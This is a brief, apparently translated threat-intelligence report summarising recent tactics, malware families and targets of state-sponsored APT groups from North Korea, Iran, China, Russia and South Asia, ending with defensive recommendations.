Purpose and Scope.

this report analyzes the strategies, techniques, and impacts of APT groups believed to be state-sponsored.
it excludes financial crimes groups from its scope and organizes major threat behaviors by ATIP’s representative names.
the activities of 13 APT groups were aggregated based on publicly available data for the most recent month.

Leading APT groups by region.

• north Korea-affiliated: Famous Chollima deploys modular Node.js-Python-Go malware on developer endpoints through fake job interviews and exploitation of VS Code-NPM repositories to steal credentials, source code, and wallet keys.
• iranian affiliate: Handala combines information gathering and system disruption to paralyze healthcare, education, and infrastructure with BiBi/Hatef wiper and expand political influence with public messaging.
• MuddyWater and others compromised U.S.-Israeli-Canadian organizations through Deno-based Dindoor, Python-based Fakeset, and payload delivery and data exfiltration attempts using legitimate cloud storage.
• chinese: Silver Dragon-UAT-9244 and others conduct long-term latent information collection with kernel and driver-level concealment and trusted service-based C2, such as Google Drive and BitTorrent.
• russian family: APT28-Sandworm utilizes Roundcube-RDP-edge equipment vulnerabilities and Wiper-OT modules to threaten national critical infrastructure in a traditional spy-sabotage parallel strategy.
• south Asia-Pakistan Family: SloppyLemming-Transparent Tribe exploits trust-based execution chains such as ClickOnce, LNK, and ISO, and produces multiple variants in AI-assisted and non-mainstream languages.

Conclusion.

state-sponsored APTs are combining social engineering with legitimate tools and cloud services to enhance stealth and persistence and achieve high success rates with target-specific lures.
target organizations need visibility into developer environments, cloud usage, email, and remote access paths, and a threat intelligence-based response system.